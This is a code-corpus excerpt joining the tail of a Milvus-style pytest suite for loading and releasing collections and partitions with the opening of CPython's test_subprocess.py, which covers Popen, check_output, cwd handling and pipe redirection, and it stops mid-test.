code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_not_load(self, connect, collection):
"""
target: test release collection without load
method: release collection without load
expected: release successfully
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_load_release(self, connect, collection):
"""
target: test load collection after load and release
method: 1.load and release collection after entities flushed
2.re-load collection
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_repeatedly(self, connect, collection):
"""
target: test load collection repeatedly
method: load collection twice
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_collection(self, connect, collection):
"""
target: test load, release non-exist collection
method: 1. load, release and drop collection
2. load and release dropped collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
connect.flush([collection_name])
connect.load_collection(collection_name)
connect.release_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.drop_collection(collection)
try:
connect.release_collection(collection)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_without_flush(self, connect, collection):
"""
target: test load collection without flush
method: insert entities without flush, then load collection
expected: load collection failed
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.load_collection(collection)
# TODO
@pytest.mark.tags(CaseLabel.L2)
def _test_load_collection_larger_than_memory(self):
"""
target: test load collection when memory less than collection size
method: i don't know
expected: raise exception
"""
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_release_part_partitions(self, connect, collection):
"""
target: test release part partitions after load collection
method: load collection and release part partitions
expected: released partitions search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, default_single_query, partition_names=[default_tag])
res = connect.search(collection, default_single_query, partition_names=[default_partition_name])
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_release_all_partitions(self, connect, collection):
"""
target: test release all partitions after load collection
method: load collection and release all partitions
expected: search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_partition_name, default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_load_partitions_release_collection(self, connect, collection):
"""
target: test release collection after load partitions
method: insert entities into partitions, search empty after load partitions and release collection
expected: search result empty
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
# assert len(res[0]) == 0
class TestReleaseAdvanced:
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected:
"""
nq = 1000
top_k = 1
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
query, _ = gen_query_vectors(field_name, cons.default_entities, top_k, nq)
future = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_during_searching(self, connect, collection):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected:
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
res = connect.search(collection, default_single_query)
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching_A(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected:
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_collection_during_loading(self, connect, collection):
"""
target: test release collection during loading
method: insert entities into collection, flush, release collection during loading
expected:
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_partition_during_loading(self, connect, collection):
"""
target: test release partition during loading
method: insert entities into partition, flush, release partition during loading
expected:
"""
connect.create_partition(collection, default_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
def _test_release_collection_during_inserting(self, connect, collection):
"""
target: test release collection during inserting
method: load collection, do release collection during inserting
expected:
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
def insert():
connect.insert(collection, cons.default_entities)
t = threading.Thread(target=insert, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
res = connect.search(collection, default_single_query)
# assert len(res[0]) == 0
def _test_release_collection_during_indexing(self, connect, collection):
"""
target: test release collection during building index
method: insert and flush, load collection, do release collection during creating index
expected:
"""
pass
def _test_release_collection_during_droping_index(self, connect, collection):
"""
target: test release collection during droping index
method: insert, create index and flush, load collection, do release collection during droping index
expected:
"""
pass
class TestLoadCollectionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test load invalid collection
method: load collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.load_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test release invalid collection
method: release collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.release_collection(collection_name)
class TestLoadPartition:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, cons.default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
logging.getLogger().info(metric_type)
get_binary_index["metric_type"] = metric_type
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
connect.load_partitions(binary_collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, connect, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
dis_connect.load_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
dis_connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_not_existed(self, connect, collection):
"""
target: test load partition for invalid scenario
method: load not existed partition
expected: raise exception and report the error
"""
partition_name = gen_unique_str(uid_load)
try:
connect.load_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_not_load(self, connect, collection):
"""
target: test release partition without load
method: release partition without load
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_after_drop(self, connect, collection):
"""
target: test load and release partition after drop
method: drop partition and then load and release it
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_collection(collection)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
class TestLoadPartitionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_partition_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
"""
target: test load invalid partition
method: load partition with invalid partition name
expected: raise exception
"""
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
"""
target: test release invalid partition
method: release partition with invalid partition name
expected: raise exception
"""
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import warnings_helper
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import types
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
import pathlib
from test.support.os_helper import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
try:
import fcntl
except:
fcntl = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
if not support.has_subprocess_support:
raise unittest.SkipTest("test module requires subprocess")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
with self.assertRaisesRegex(ValueError,
"stdout argument not allowed, it will be overridden"):
subprocess.check_output([], stdout=None)
with self.assertRaisesRegex(ValueError,
"check argument not allowed, it will be overridden"):
subprocess.check_output([], check=False)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_input_none(self):
"""input=None has a legacy meaning of input='' on check_output."""
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None)
self.assertNotIn(b'XX', output)
def test_check_output_input_none_text(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, text=True)
self.assertNotIn('XX', output)
def test_check_output_input_none_universal_newlines(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, universal_newlines=True)
self.assertNotIn('XX', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with os_helper.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"buf = sys.stdout.buffer; "
"buf.write(os.getcwd().encode()); "
"buf.flush(); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode()))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
